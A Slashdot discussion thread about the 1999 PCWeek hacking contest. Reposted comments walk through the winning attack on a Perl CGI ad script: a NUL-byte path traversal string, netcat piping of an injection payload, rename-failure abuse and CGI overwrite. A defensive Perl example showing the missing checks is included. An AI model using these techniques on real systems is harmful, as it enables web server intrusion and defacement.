Slashdot Mirror


PCWeek "Hack This Page" Cracked

mrflip writes "On September 20th, PCWeek announced a $1000 contest to be the first to hack either the linux or the NT server they set up. Well, four short days later, the linux box seems to have been compromised. The winner states "Hi guys, It's been a nice challenge, now send me the cash :)." He explained that the exploit was not a linux feature but was due to a closed source CGI script with improper security checks. " Going to require Solomonic ruling - the intent was to test the two OSes, and this is obviously not an OS test.

258 comments

  1. Re:[offtopic] a gender neutral way to say it by Anonymous Coward · · Score: 0

    The `or she' is redundant. In correct, formal English, `he' is used in both the masculine and unspecified cases. In informal usage, `they' is perfectly acceptable for the unspecified case, and has been for centuries.

  2. Re:Sour Grapes - linux lost by Anonymous Coward · · Score: 0

    Red Hat is Linux.

  3. Re:CGI Script Security by Anonymous Coward · · Score: 0
    I'm not familiar with Red Hat 6.0, anybody know of any closed source CGI scripts installed by default? And just why do you need any default CGI scripts in the first place? The first thing any competent web admin should do is go into the cgi-bin directory and at the least remove execute permissions from all CGI scripts until they have had time to look over the code and understand what the CGI script does. It's even worse that Red Hat would put a closed source CGI in there.

    Web servers are run as user nobody so that they can't compromise the system. You generally don't make files owned by nobody, unless you want to get owned by some script kiddie. I don't think even Red Hat would be stupid enough to set up the directory permissions as with write access for everybody. Probably a SUID CGI script. Hopefully not owned by root.

    I'll install my own web server, thank you.

  4. These aren't the crackers you're looking for by Foz · · Score: 1

    These "hack this box" attempts are nothing more than publicity stunts, meant to satisfy a particular political agenda. They prove nothing technically.

    These stunts generally only attract script-kiddies... a population against which any reasonably competent sysadmin can protect themselves against with a fair amount of effectiveness no matter WHAT their OS is (yes, even NT).

    The type of cracker that doesn't go in for these cheap publicity shots is the type that you really need to be worried about anyway, and those crackers will penetrate your defenses no matter what you do to stop them.

    For an interesting read on the type I'm referring to, check out the 8 second crack article on the internet auditing project. It's a long (but interesting) read; the particularly juicy part is down in the Third week section.

    That kind of cracker doesn't particularly care which OS you're running, they'll drop you in your tracks no matter what.

    -- Gary F.

  5. Re:Can you say "one-track mind"? by dave256 · · Score: 1
    • Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL, all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a password. If you wanted Linux to be more secure, you could try making it easier to batten down the hatches.

    Something that I think a lot of people fail to forget is the fact that linux is not a desktop OS (yet). As things stand now, linux is a server. It doesn't "do" games linux windows, it doesn't "do" the common desktop things like windows does. Face it. In the area of mass induhvidual usage, windows has the market.

    But Dave! What of GNOME and KDE? I shall enlighten you. They are wonderful. They are ubercool. But have you ever tried to sit a newbie down in front of gnome and explain the concept of "multiple desktops" and the "pager" to 'em? The reason linux is harder to secure is because most distributions' default install starts up all sort of unrequired stuff, because, generally.. well, really, I have no idea why they start it up. When installing windows, you don't have to worry about a FTP server, or a NFS server, or a NIS/NIS+ server, or a DNS (would you like caching with that?) server, or a ...


    I want a rock.

  6. Re:No one has hacked the NT machine ... by Alascom · · Score: 2

    That rant of yours is very funny. Let me explain that securent.hackpcweek.com IS vulnerable. The problem isn't NT however, it's in the HTML code on the server. Similarly, the Linux wasn't vulnerable, but the CGI script was. YES, SECURENT CAN BE HACKED. You heard it here first. The rules state: break into the system, modify pages, and/or steal user information. Well, according to those rules it can be broken. Let me explain. I examined the SECURENT html source and noticed several links to "www.hackpcweek.com.com" (notice the extra .com). Then I contacted Curt Connell with EDS who is Administrative contact for COM.COM. (Please don't call or bother him anymore). A simple 'A' record in the .com.com DNS server referring 'www.hackpcweek.com.com' to my own web server would allow me to steal user information. What's more, the user would believe they were still on a real "pcweek" server seeing valid pcweek documents, allowing me to send malicious code, request confidential information, etc. Curt was unable to get "official" EDS permission to create the 'A' record, but the hack is valid and does exist. (Again, please do not bother Curt anymore). A simple goof in the HTML code renders the NT box 'hackable'. A side benefit is we circumvent the Firewall, IDS and other security features by just directing to another site. Oops. The NT 'IS' vulnerable to attack. In closing, don't consider an operating system insecure based on the applications (or HTML) that's on it. -Alascom alascom@dc2600.com

  7. Re:Too many variables by zarcher · · Score: 1

    >Question- if the same CGI script(s) were running on both systems, why didn't it fail on the NT system as well?

    They didn't run the same application on both servers.

    Here is a quote from a ZDNet

    On each of the servers we loaded similar applications. For NT, we developed a classified-ad engine based on a Microsoft Guestbook application. For Linux, the Labs chose Smart Photo Ads, a popular classified-ad engine for the platform. Both the NT and Linux apps have stored user names, which represent proprietary data and require sites to maintain a secure status.

    They go into other details on the page.

  8. Good for Linux in the long run by rmcd · · Score: 1

    Seems to me that this is what linux advocates should want: direct, high-profile comparisons to NT. That's how you get mindshare. This won't be the last test like this. NT will "win" some, Linux will "win" some, there will always be arguments about how the test was conducted. But it will get people thinking that it's reasonable to speak of both OS's in the same breath.

  9. Re:...Jesse Burst? by Anonymous Coward · · Score: 0

    Berst? Pro-MS? Hardly. Berst is just a dumbass.

  10. Re:Why isn't a Mac involved? by Anonymous Coward · · Score: 0

    macs are secure by default because they have no services. MacOS was designed as a desktop OS, not a server os. If I shut down all the services on my NT,Linux box they would be pretty secure too. Don't get me wrong, I love macs. Wish I had a G4.

  11. astroturf campaign continues by Anonymous Coward · · Score: 0

    there are more astroturfers in this thread than fbi agents on irc.

  12. Re:: No one has hacked the NT machine by Alascom · · Score: 5

    That rant of yours is very funny. Let me explain that securent.hackpcweek.com IS vulnerable. The problem isn't NT however, it's in the HTML code on the server. Similarly, the Linux wasn't vulnerable, but the CGI script was. YES, SECURENT CAN BE HACKED. You heard it here first. The rules state: break into the system, modify pages, and/or steal user information. Well, according to those rules it can be broken. Let me explain. I examined the SECURENT html source and noticed several links to "www.hackpcweek.com.com" (notice the extra .com). Then I contacted Curt Connell with EDS who is Administrative contact for COM.COM. (Please don't call or bother him anymore). A simple 'A' record in the .com.com DNS server referring 'www.hackpcweek.com.com' to my own web server would allow me to steal user information. What's more, the user would believe they were still on a real "pcweek" server seeing valid pcweek documents, allowing me to send malicious code, request confidential information, etc. Curt was unable to get "official" EDS permission to create the 'A' record, but the hack is valid and does exist. (Again, please do not bother Curt anymore). A simple goof in the HTML code renders the NT box 'hackable'. A side benefit is we circumvent the Firewall, IDS and other security features by just directing to another site. Oops. The NT 'IS' vulnerable to attack. In closing, don't consider an operating system insecure based on the applications (or HTML) that's on it. -Alascom alascom@dc2600.com

  13. Horsefeathers. by Anonymous Coward · · Score: 0

    ZDnet setup Linux ... Again !!! What if you put a secure CGI program on Linux and a bad one on NT? I'd bitch too. Linux kernel is not responsible for a poorly written CGI. Hell, you can write a CGI program to do whatever you want.

  14. Re:Why isn't a Mac involved? by mrowlands · · Score: 1

    Maybe because there are no Mac servers out there?

  15. Re:What if IIS had the hole? by witz · · Score: 1

    That doesn't denote OS integration, it denotes a lack of cross platform availability. Don't confuse the issue.

  16. Re:That's it! by Anonymous Coward · · Score: 0

    *chokes on laughter spittle and dies* Not that I can talk. I only use my linux box for personal computing, like most windows users do. I have my root's password set to, er, password and I've never changed it. Also, I have a file named passwords in root's home... I think you can guess the contents. But don't expect to hack in. I won't care. And what do I care? I can just format everything and start over. Hell, if you gave me that linux box to administer, I would probably chmod 777 *. Well, I probably would by accident even if I didn't get ordered to, for "FUDA." (FUD Ammunition) Oh yeah, and some of these Linux people are going a little... overboard, but this contest really didn't prove anything, I mean HELL, it was a CGI script that got broken into!

  17. Re:CGI Script Security by Anonymous Coward · · Score: 1
    if the CGI script was owned by nobody then it is logical the webpage was also owned by nobody and possibly had the permissions 4600, therefore, the CGI script possibly had write access to the webpage.

    No, it's not logical at all. Why would you run a webserver as a different user and then chown all the files in htroot to that user's ID?

    What's the point? The idea is to do damage control and so the webserver's uid (nobody) shouldn't have any rights to do anything else.

  18. Re:Troll by Anonymous Coward · · Score: 0

    This has nothing to do with Unix security. Obviously the admin didn't bother to set up any security. If the script was running as "nobody", it would be nearly impossible to crack the system with it. Unix security could be better, but setting it up correctly would have prevented this crack.

  19. Re:OS security? by sterwill · · Score: 1

    Linux did not lose. A CGI script lost.

    --

  20. Re:Can you say "one-track mind"? by platypus · · Score: 1

    Cool, someone else who noticed that. That's the bass thingie, I wondered why nobody seemed to have noticed this before.
    Last year, someone on alt.hackers.malicious bothered everyone when he posted his ip-address and told the people they would not be able to hack him, because his nt-box was so secure. This happens always by someone who wants to get someone else in trouble, but this time it was really the guy's own machine.
    Three days later he posted from a different os (w95) and told that someone had broken into his machine and wiped his hd. He continued to say that this guy had contacted him afterwards and that this guy was a security pro. The pro explained him that he didn't have any chance from the beginning, despite following all ms security advisories - that's the joy of black box systems...

  21. Re:I find it interesting that ZDnet ruled out... by Anonymous Coward · · Score: 0

    "Since vanilla NT has virtually no remote administration or remote anything capabilities, it had a natural advantage in this test."

    Bullshit. Put RAS on there, get a trusted connection and you can remotely administer just about anything on an NT machine. I do it all day everyday, as well as from home to work, quite often though I love when Linux zealots tell me it can't be done.

  22. Re:Sour Grapes - linux lost by Anonymous Coward · · Score: 0

    > Red Hat is Linux.

    *sigh* Too... stupid...

    Linux= Godlike OS.
    Red Hat= Company.
    Red Hat Linux= Linux DISTRIBUTION. (Not very secure, I suppose, but I dunno.)
    Distribution= Linux with various programs/scripts, variables set for easy usage, etc. Basically, a kitted out version.

    Type cast incorrect for assertion. (Company, Godlike OS.) (Yes, this is a screwed up C error msg.)

  23. Re:NT admin by Anonymous Coward · · Score: 0

    NT admin
    ROFL


    That's exactly the sort of comment that exemplifies the general Linux community. Can't win in the real world so either propagate FUD or just claim some ethereal superiority. The humor is the fact that only your fellow Linux lackies believe it: The rest of us are laughing our asses off at you.

  24. All OSs are insecure by Anonymous Coward · · Score: 0
    Look at attrition.org. They all get 0wn3d: NT, Linux, Solaris, FreeBSD, OpenBSD, etc.

    NT's biggest problem isn't security (although that is a problem); it's stability.

  25. Re:Hacking CGI is fair by Anonymous Coward · · Score: 0

    Yep, Satan is a pretty, um, specialized tool. (Yes, I realize that you are just talking about the utility. I am just being a jerk. But you probably knew that.)

  26. Re:Can you say "one-track mind"? by Tony-A · · Score: 1

    NETWATCH.EXE
    It is in the NT Server Resource Kit.
    You can see who is accessing your (or anyone else's) files. Actually can be very useful.

  27. Re:[offtopic] a gender neutral way to say it by Anonymous Coward · · Score: 0

    Actually, since it was one person who cracked, you would have to use she/he.

  28. Oh, do linux installations ... by ghazban · · Score: 1

    come with those cgi scripts automatically installed? I don't think so, thus it is not a problem with an out of the box distro, but rather their (or someone else's) programming.

  29. Re:Well what did THIS prove? by mlefranc · · Score: 1

    I quite agree. However, whereas this does not prove anything regarding Linux, it certainly does prove something regarding the Red Hat secure server as it was shipped until now (I guess there will be some updates in a near future)

    P.S. Any news regarding the 'RedHat Linux on NT' diagnostic by netcraft ?

  30. People count by platinum · · Score: 3

    A system's security is only as good as its administrator.

    1. Re:People count by Signal+11 · · Score: 3

      ... of course having an OS with holes big enough to drive a bus through doesn't help matters.

      --

    2. Re:People count by solar · · Score: 1

      For a flame-baiter, you sure have a hard time detecting flame-bait...

    3. Re:People count by solar · · Score: 2

      I'm quoting this from the "hack this whatever its called" website:
      >>Finally, here's one last tidbit of information... pcweek is owned by Ziff-Davis publishing
      >>Excerpt from the ZD home page
      >>Ziff-Davis is a publicly traded company listed on the New York Stock Exchange
      >>(NYSE). A majority interest is owned by SOFTBANK CORPORATION.
      >>SOFTBANK is Japan's largest distributor of computer software...
      >>Excerpt from Microsoft's home page
      >>REDMOND, Wash. - March 24, 1999 - Microsoft Corp. today announced it has
      >>signed a memorandum of understanding to enter a joint venture with Softbank
      >>Corp. and Yahoo! Japan to create the Japanese version of the MSN CarPoint
      >>online service...The initial capital of the new company will be $7 million, with 50
      >>percent of its common stock owned by Softbank, 40 percent by Microsoft and 10
      >>percent by Yahoo! Japan. Masayoshi Son will be CEO and president of the new
      >>company...
      >>Excerpt from the ZD home page--
      >>ZIFF-DAVIS INC.
      >>DIRECTORS AND EXECUTIVE OFFICERS
      >>Masayoshi Son
      >> Director
      Draw your own conclusions, free thinkers....

    4. Re:People count by Anonymous Coward · · Score: 2
      A system's security is only as good as its administrator.
      Although this is fundamentally true, we need to be careful making this argument, as it plays directly into Windows NT's marketing strategy.

      The fact is that all of Microsoft's recent success -- especially with respect to Windows NT -- can be attributed to the successful marketing of a single message:
      Any idiot can run Windows NT. It takes a genius to manage Unix.

      The appeal of this message to IT directors and CIOs is clear. MS has successfully planted the meme that a company can get more done with 2 green MSCEs at $35k per year than with one seasoned Unix admin at $75k per year.

      Of course, those of us who are in the trenches with NT and Unix on a day-to-day basis know that this argument is a load of fetid dingo's kidneys, but we're not the ones who make the enterprise architecture decisions... and Microsoft is taking full advantage of that fact.

      The challenge for the Linux and Unix community is to demonstrate the fallacy of Microsoft's message -- to show that "Wizards" and other GUI sleight-of-hand are not a substitute for knowledge and experience. How to do this? I don't know. NT directors and CIOs don't like to admit they've been snowed by crafty salesmen.

    5. Re:People count by Anonymous Coward · · Score: 0

      Dude, this ain't the X-Files. There is no conspiracy. Get over it.

    6. Re:People count by Anonymous Coward · · Score: 0

      YES!! My sysadmin at my school can barely read, denies public access to the web server (port 80 FIREWALLED) and uses Windoze!!. He also uses Solaris 2.1 (for telnet, of which the root passwd is root :-))! Dumb sysadmins = insecure computers!

    7. Re:People count by Zurk · · Score: 1


      Author: pankaj (10.0.0.1)
      Date: 09-25-1999 00:16

      Kudos to Jfs, here are the details straight from the horse's mouth. We'll post them on the Linux site homepage later

      First of all, I had to gather information on the remote host, what ports the machine had open and what possibilities were
      left open. After checking that most of the ports were either filtered by the firewall or unusable due to the tcp
      wrapper in the host, I decided that I was left only with the HTTP server.

      lemming:~# telnet securelinux.hackpcweek.com 80
      Trying 208.184.64.170...
      Connected to securelinux.hackpcweek.com.
      Escape character is '^]'.
      POST X HTTP/1.0

      HTTP/1.1 400 Bad Request
      Date: Fri, 24 Sep 1999 23:42:15 GMT
      Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
      (...)
      Connection closed by foreign host.
      lemming:~#

      So, it was running apache on a Red Hat box. The webpage said that the server will also run mod_perl, but mod_perl leaves
      a fingerprint in the Server: header which was not shown in the header that this server sent out.

      Apache 1.3.6 doesn't ship with any CGI programs available to the remote user, but I didn't know about the RH distro, so I
      gave the common faulty CGIs a try (test-cgi, wwwboard, Count.cgi...)

      After no results, I tried to find out what the website structure was, gathering information from the HTML pages, I found
      out that the server had these directories under the DocumentRoot of the website:

      /
      /cgi-bin
      /photoads/
      /photoads/cgi-bin

      So I got interested in the photoads thingie, which seemed like an installable package to me. After some searching on the
      WWW I found out that photoads was a commercial CGI package from "The Home Office Online"
      (http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check
      and modify it.

      I asked a friend if he would let me have a look at his photoad installation
      and this is how I got access to a copy of what could be running in the securelinux machine.

      I checked the default installation files and I was able to retrieve the ads database (stored in the
      http://securelinux.hackpcweek.com/photoads/ads_data.pl) with all the user passwords for their ads. I also tried to access
      the configuration file /photoads/cgi-bin/photo_cfg.pl but because of the server setup I couldn't get it.

      I got the /photoads/cgi-bin/env.cgi script (similar to test-cgi) to give me details of the server such as the location in
      the filesystem of the
      DocumentRoot (/home/httpd/html) apart from other interesting data (user the
      server runs as, in this case nobody).

      So, first things first, I was trying to exploit either SSI (Server side includes) or the mod_perl HTML-embedded commands,
      which look something like:

      for SSI
      for mod_perl

      The scripts filtered this input on most of the fields, through a perl regexp that didn't leave you with much room to
      exploit. But I also found a user assigned variable that wasn't checked for strange values before making it into the HTML
      code, which will let me embed the commands inside the HTML for server side parsing:

      In post.cgi, line 36:
      print "you are trying to post an AD from another URL: $ENV{'HTTP_REFERER'}\n";

      The $ENV{'HTTP_REFERER'} is a user provided variable (though you have to know a bit of how HTTP headers work in order to
      get it right), which will allow us to embed any HTML into the code, regardless of what the data looks like.

      Refer to the files getit.ssi and getit.mod_perl for the actual exploit.
      To exploit it, do something like:

      lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

      But unfortunately, the host didn't have SSI nor mod_perl configured, so I
      hit a dead end.

      I decided to find a hole in the CGI scripts. Most of the holes in perl scripts are found in open(), system() or `` calls.
      The first allows reading, writing and executing, while the last two allow execution.

      There were no occurrences of the last two, but there were a few of the open() call:

      lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

      advisory.cgi: open (DATA, "$BaseDir/$DataFile");
      edit.cgi: open (DATA, ">$BaseDir/$DataFile");
      edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
      photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
      photo.cgi: open ( FILE, $filename );
      (...)

      There was nothing to do with the ones referring to $BaseDir and $DataFile as these were defined in the config file and
      couldn't be changed in runtime.
      Same for the $mailprog.

      But the other two lines are juicier...

      In photo.cgi, line 132:
      $write_file = $Upload_Dir.$filename;

      open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
      print ULFD $UPLOAD{'FILE_CONTENT'};
      close(ULFD);

      So if we are able to modify the $write_file variable we will be able write to any file in the filesystem. The $write_file
      variable comes from:

      $write_file = $Upload_Dir.$filename;

      $Upload_Dir is defined in the config file, so we can't change it, but what about $filename?

      In photo.cgi, line 226:
      if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }

      $filename = lc($UPLOAD{'FILE_NAME'});
      $filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

      if ($filename =~ m/gif/) {
          $type = '.gif';
      }elsif ($filename =~ m/jpg/) {
          $type = '.jpg';
      }else{
          {&Not_Valid_Image}
      }

      So the variable comes from $UPLOAD{'FILE_NAME'} (extracted from the variables sent to the CGI by the form). We see a
      regexp that $filename must match in order to help us get where we want to get, so we can't just send any file we want to,
      e.g. "../../../../../../../../etc/passwd", cos it will get nulled out by the substitution :

      $filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

      We see, if the $filename matches the regexp, it's turned to ascii 1 (SOH).
      Apart from this, $filename must contain "gif" or "jpg" in its name in order
      to pass the Not_Valid_Image filter.

      So, after playing a bit with various approaches and with a bit of help from
      Phrack's last article on Perl CGI security we find that

      /jfs/../../../../../../../export/www/htdocs/index.html%00.gif

      should allow us to refer to the index.html file (the one we have to modify, the main page in the web server).

      But then, in order to upload we still need to fool some more script code...
      We notice that we won't be able to fool the filename if we send the form in
      a POST (the %00 doesn't get translated), so we are left out with only a GET.

      In photo.cgi, line 256, we can see that some checks are done in the actual content of the file we just uploaded (:O) and
      that if the file doesn't comply with some specifications (basically width/length/size) of the image (remember, the
      photo.cgi script was supposed to be used as a method to upload a photoad to be bound to your AD). If we don't comply with
      these details the script will delete the file we just uploaded (or overwritten), and that's not what we want (at least
      not if we want to leave our details somewhere in the server :).

      PCWeek has the ImageSize in the configuration file set to 0, so we can forget about the JPG part of the function. Let's
      concentrate on the GIF branch:

      if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
          open ( FILE, $filename );
          my $head;
          my $gHeadFmt = "A6vvb8CC";
          my $pictDescFmt = "vvvvb8";
          read FILE, $head, 13;
          (my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
          close FILE;
          $PhotoWidth = $width;
          $PhotoHeight = $height;
          $PhotoSize = $size;
          return;
      }

      and in photo.cgi, line 140:

      if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
          {&Not_Valid_Image}
      }

      if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
          {&Height_Width}
      }

      So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default).

      So we are left with $PhotoWidth != "" && $PhotoWidth

    8. Re:People count by Zurk · · Score: 1

      So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default).

      So we are left with $PhotoWidth != "" && $PhotoWidth < 350.
      For $PhotoHeight it has to be smaller than $ImgHeight (250 by default).

      So, $PhotoWidth == $PhotoHeight == 0 will do for us. Looking at the script that gets the values into those variables, the
      only thing we have to do is to set the values in the 6th to 9th byte to ascii 0 (NUL).

      We make sure that we put our FILE_CONTENT to comply with that and proceed with the next problem in the code...

      chmod 0755, $Upload_Dir.$filename;
      $newname = $AdNum;
      rename("$write_file", "$Upload_Dir/$newname");

      Show_Upload_Success($write_file);

      Argh!!! After all this hassle and the file gets renamed/moved to somewhere we don't want it to be :(
      Checking the $AdNum variable that gives the final location its name we see that it can only contain digits:

      $UPLOAD{'AdNum'} =~ tr/0-9//cd;
      $UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+?%$@*//cd;
      $AdNum = $UPLOAD{'AdNum'};

      Anything else gets removed, so we can't play with the ../../../ trick in here anymore :|

      So, what can we do? The rename() function expects us to give him two paths, the old one and the new one... wait, there is
      no error checking on the function, so if it fails it'll just keep on processing the next line. How can we make it fail?
      using a bad file name. Linux kernel has got a restriction on how long a file can be, defaults to 1024 (MAX_PATH_LEN), so
      if we can make the script rename our file to something longer than 1024 bytes, we'll have it! :)
      So, next step we pass it a _really large_ AD number, approximately 1024 bytes long.
      Now, the script won't allow us to process the script as it only allows us to post photos for ADs number that do exist...
      and it will take us a hell of a lot of time to create that many messages in the board 10^1024 seems quite a long time to
      me :)
      So... another dead end?

      Nah, the faulty input checking functions let us create an ad with the number we prefer. Just browse through the edit.cgi
      script and think what will happen if you enter a name that has a carriage return in between, then
      a 1024 digits number? :) We got it...

      Check the long.adnum file for an exploit that gets us the new ad created.

      So, after we can fool the AdNum check, the script makes what we do, that is:

      Create/overwrite any file with nobody's permissions, and with the contents
      that we want (except for the GIF header NULs).

      So, let's try it

      Check the overwrite.as.nobody script that allows us to do that.

      So far so good. So, we adjust the script to overwrite the index.html web page... and it doesn't work. Duh :(
      It's probably that we didn't have the permission to overwrite that file (it's owned by root or it's not the right mode to
      overwrite it). So, what do we do now? Let's try a different approach...
      We try to overwrite a CGI and see if we can make it run for us :) This way we can search for the "top secret" file and
      we'll get the prize anyway :)

      We modify the overwrite script, and yes, it allows us to overwrite a CGI! :)
      We make sure we don't overwrite any important (exploit-wise) CGI and we choose the advisory.cgi (what does it do anyway?
      :)).
      So, we will upload a shell script that will allow us to execute commands, cool...

      But then, when you run a shell script as a CGI, you need to specify the
      shell in the first line of the script, as in:

      #!/bin/sh
      echo "Content-type: text/html"
      find / "*secret*" -print

      And remember, our 6th, 7th, 8th and 9th bytes had to be 0 or a very small value in order to comply with the size
      specifications...

      #!/bi
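
The input checks that the write-up quoted in the two comments above found missing, as an added Perl example (not Photo Ads code and not part of either comment). The function names, the GIF-only policy and the upload directory are assumptions; the 350x250 limits are the defaults the write-up quotes.

```perl
#!/usr/bin/perl
# Added example, not Photo Ads code. Function names and limits are assumptions.
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);
use File::Spec;
use File::Temp qw(tempdir);

my ($MAX_W, $MAX_H) = (350, 250);    # default limits quoted in the write-up

# Escape a request header before echoing it into HTML (the HTTP_REFERER case).
sub html_escape {
    my ($s) = @_;
    $s = '' unless defined $s;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$ent{$1}/g;
    return $s;
}

# Client file name: refuse control bytes (NUL truncation, CR/LF), keep only the
# last path component, and anchor the extension instead of matching "gif"
# anywhere in the string. The result is used only as a check.
sub safe_upload_name {
    my ($raw) = @_;
    return undef unless defined $raw && length $raw;
    return undef if $raw =~ /[\x00-\x1f\x7f]/;
    my $name = lc $raw;
    $name =~ s{^.*[\\/]}{};
    return undef unless $name =~ /\A[a-z0-9][a-z0-9_-]{0,63}\.gif\z/;
    return $name;
}

# Ad number: validate, do not strip. \z (not $) refuses a trailing newline and
# the length bound keeps the later rename() target short.
sub safe_ad_number {
    my ($raw) = @_;
    return undef unless defined $raw && $raw =~ /\A[0-9]{1,9}\z/;
    return $raw + 0;
}

# Width and height from the GIF logical screen descriptor (little-endian).
sub gif_dimensions {
    my ($content) = @_;
    return unless defined $content && length($content) >= 10;
    return unless $content =~ /\AGIF8[79]a/;
    return unpack 'x6 v v', $content;
}

# Validate everything first, write to a temporary name inside the upload
# directory, and treat a failed rename() as a failed upload.
sub store_upload {
    my ($upload_dir, $raw_name, $raw_adnum, $content) = @_;
    return (0, 'rejected file name')
        unless defined(safe_upload_name($raw_name));
    my $adnum = safe_ad_number($raw_adnum);
    return (0, 'rejected ad number') unless defined $adnum;
    my ($w, $h) = gif_dimensions($content);
    return (0, 'not a GIF within the size limits')
        unless defined $w && $w >= 1 && $w <= $MAX_W && $h >= 1 && $h <= $MAX_H;

    # The stored name is built from the validated number, never from the client.
    my $final = File::Spec->catfile($upload_dir, "$adnum.gif");
    my $tmp   = "$final.tmp.$$";
    sysopen(my $fh, $tmp, O_WRONLY | O_CREAT | O_EXCL, 0644)
        or return (0, "create failed: $!");
    binmode $fh;
    my $ok = print {$fh} $content;
    $ok = close($fh) && $ok;
    unless ($ok && rename($tmp, $final)) {
        unlink $tmp;
        return (0, 'write or rename failed');
    }
    return (1, $final);
}

# Constructed inputs modelled on the steps in the write-up.
my $dir  = tempdir(CLEANUP => 1);
my $gif  = 'GIF89a' . pack('v v', 120, 90) . "\x00" x 3;
my $zero = 'GIF89a' . pack('v v', 0, 0) . 'not an image';
my @cases = (
    [ 'plain upload',           'photo.gif',                        '42',       $gif  ],
    [ 'traversal plus NUL',     "/a/../../htdocs/index.html\0.gif", '42',       $gif  ],
    [ '"gif" not at the end',   'gif.cgi',                          '42',       $gif  ],
    [ 'overlong ad number',     'photo.gif',                        '9' x 1100, $gif  ],
    [ 'ad number with newline', 'photo.gif',                        "42\n",     $gif  ],
    [ 'zero width and height',  'photo.gif',                        '42',       $zero ],
);
for my $c (@cases) {
    my ($label, @args) = @$c;
    my ($ok, $msg) = store_upload($dir, @args);
    printf "%-24s %s\n", $label, $ok ? 'stored' : "refused: $msg";
}
print html_escape('http://example.test/?q="><b>constructed</b>'), "\n";
```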

    9. Re:People count by md_doc · · Score: 1

      In this case it was a programmer who is probably a windows programmer just converted a cgi over really fast to work on linux. Woo-hoo and you wonder why hacks are bad? Please take pride in your programming. I am sure this is not how pcweek had wanted this to end either.

      --MD--

    10. Re:People count by Melkman · · Score: 1

      Yup, and as much as I hate to say it: I told you so.. You could see this coming miles away.

    11. Re:People count by Anonymous Coward · · Score: 0

      These Linux (i.e. anti-Microsoft) fanatics really are barmy. They act as if an operating system is some sort of cult, and think everyone else is the same way.

  31. Re:Troll by Anonymous Coward · · Score: 1
    This has nothing to do with Unix security. Obviously the admin didn't bother to set up any security.

    Of course it has. With Inferno for instance you would have run the script with an empty name space (the script can only access an empty directory and nothing out of this), and it won't matter if you are user sys, nobody, or god. You can achieve the same thing by doing a chroot on your script, but then your server needs to be running as root, and some problems appear. Because chroot brings too many problems, it is not used as much as it should. Because Inferno namespaces are properly implemented, they would be the default on any server using CGI scripts. Security by correct design.

    If the script was running as "nobody", it would be nearly impossible to crack the system with it.

    First you are assuming that no setuid program is available that has problems (which I doubt). Second you are assuming that reading some files is not a problem, with which I disagree (for instance, some files could hold passwords, used by other authentication CGI scripts, run as "nobody").

    You can make a Unix installation secure (with chroot, directory changes, etc...), but the problem is that you have to go through an exhaustive examination of possibilities (you must set all the directory/files user/group/public rights correctly, and check that all the scripts create files with proper rights). The problem is: everything that is not explicitly checked and forbidden might be exploitable. Compare with Inferno security, when you empty the namespace of a process: everything that you have not explicitly allowed is not doable. Unix is insecure by default, but can be secured by exhaustive review. This is not a good security model.

    Unix security could be better, but setting it up correctly would have prevented this crack.

    It should have been set correctly by default. It wasn't, because it is inconvenient, or not possible (the CGI author, doesn't know how 'nobody' is used on the host machine [could be used for printing, etc..]. Only the admin knows, and has to review everything).

  32. Re:Dan Attenborough by DrMaurer · · Score: 1

    Thanks for responding
    It must be tested
    Totally agree.
    I hope Linux comes out on top ...I sincerely believe that it will ...but it's my responsibility to be open to an alternate outcome.
    Okay, I was responding to one point in your post, we both know this, and I know that you didn't mean it quite the way it came out, but I still felt inspired. It's not often that I do that, well, at least as effectively.
    The most secure OS will win, and we ALL know that that hasn't come out yet.
    Linux isn't it, WinNT isn't it, Mac isn't it, BeOS isn't it(not much of a server even, but it's not made for that, which is another point, but I like mentioning my fav OS in any post:), FreeBSD isn't it.
    Any system that is turned on is insecure. We all know this. It's the first rule of computer security. However, all solutions must be tested fairly.
    I'm all for these competitions, not because today the NT folks come out on top and tomorrow Linux will, and so on, and their respective zealot users will still bicker and post on comp.os.*.advocacy. As long as the coders and testers and hackers (the survival of the fittest element) realize what's going on, I think these contests do nothing but help.
    For *'s sake, it's just an operating system!
    Just because I'd build a machine for my girlfriend and put windows on it doesn't mean windows is the end all/be all. Just cuz I'd choose Be as my desktop and Linux as my local server, doesn't mean anything!
    Security is everyone's business, not just the NT or the *nix folks or the mac folks either. When one site gets hacked, there's something wrong, fix it, no matter the OS.
    This pesky OS battle shit is dumb and we all know it, even if we continue with our little Linux/Be/Win/Mac/BSD/Amiga/Unix/(brand new thing here), we need to get our heads out of our ass and realize that command prompt or mouse pointer, there's work to do.
    For some of us that's security and stability issues. For others it's just to type a memo, for others still it's the great american novel or CD of the year.
    Have a nice day.

    --
    Dan
  33. Pay up, fix the problem and try again by flatrock · · Score: 3

    The test has some flaws. They should pay the winner, fix the faulty CGI script, and try again.

  34. Re:Can you say "one-track mind"? by Anonymous Coward · · Score: 0

